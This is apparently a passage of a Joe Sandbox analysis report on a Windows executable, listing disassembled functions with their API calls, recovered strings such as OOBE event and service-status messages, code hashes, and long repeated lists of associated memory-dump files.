                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2429184316
                                                                                                                                                                                                                                                                    • Opcode ID: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction ID: 925ded1f5c256d2d7ca2cb9baee336687e69f41301eaf6f7f9b06fcd4507b0e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E310270740602ABD708CF15CD95B5ABBA8FF45715F10023AE609A7AD0DB7DF9508B9C
                                                                                                                                                                                                                                                                    Function 0040BB70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0040BC81
                                                                                                                                                                                                                                                                      • Part of subcall function 0046B5AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004C94C0,?,?,00468759,?,004C13D0,?), ref: 0046B60E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionInitRaisestd::locale::_
                                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2020603122-1866435925
                                                                                                                                                                                                                                                                    • Opcode ID: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction ID: 1c84d52ffb255289c8c822d3fe868fb1937b2b01e66fc20b4b360ecd81d27cfb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 923104B1900704BBD310DF55C806B96B7A4FB00718F10422FE8049BAC1E7BEB5548BDA
                                                                                                                                                                                                                                                                    Function 00401770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Setting Service Status state to %d , xrefs: 00401800
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d , xrefs: 0040187E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastServiceStatus
                                                                                                                                                                                                                                                                    • String ID: ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d $ReportSvcStatus : Setting Service Status state to %d
                                                                                                                                                                                                                                                                    • API String ID: 1547514316-586121575
                                                                                                                                                                                                                                                                    • Opcode ID: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction ID: 2a8e6345c1da827573bafa61699fe2058e0613da09c450c42f65518c3299f71e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3431C1B1A40215AFE700DF5ADC85F5A7BA8EB04724F14417FF904A7391EF74AA008BA9
                                                                                                                                                                                                                                                                    Function 00414530 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004145A9
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0041461B
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041463D
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00414660
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2694047013-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction ID: cab6b8252c7ea6f46c49d82a6c8e4df40f83147f90a4d45c9da3e1dc65de2ae0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41DD728001499FCB10DF59C880AAEB7B5FB94324F24426ED905633A0EB38AD41CB9A
                                                                                                                                                                                                                                                                    Function 00404306 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004044EC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2079671238-3942007460
                                                                                                                                                                                                                                                                    • Opcode ID: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction ID: aac3e4b64ef8bd33976eafc0c19c8d66d4ba662bde6bb840a130360140da2fc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87212670B843109BCB20DF148C4675A3B58AF51B11F1404BFE9466B2C1DEBCA905C7AE
                                                                                                                                                                                                                                                                    Function 00404050 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,00000008,?,?,004059AA), ref: 0040405B
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00497733,?,?,004059AA), ref: 00404065
                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 004040F5
                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,004059AA,?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 00404103
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDeleteSection$InitializeUninitialize
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161803370-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction ID: 8dbd2ad74c855c1e3886fba8a0bf51dabcff8673f71024995de98868baa7c6da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11B2B16001416BD704EBA6DC49B59B7A8FF90319F10013AF309C7A90DBB9F964C7AA
                                                                                                                                                                                                                                                                    Function 0041FE90 Relevance: 5.4, APIs: 4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 0041FF5B
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041FF65
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
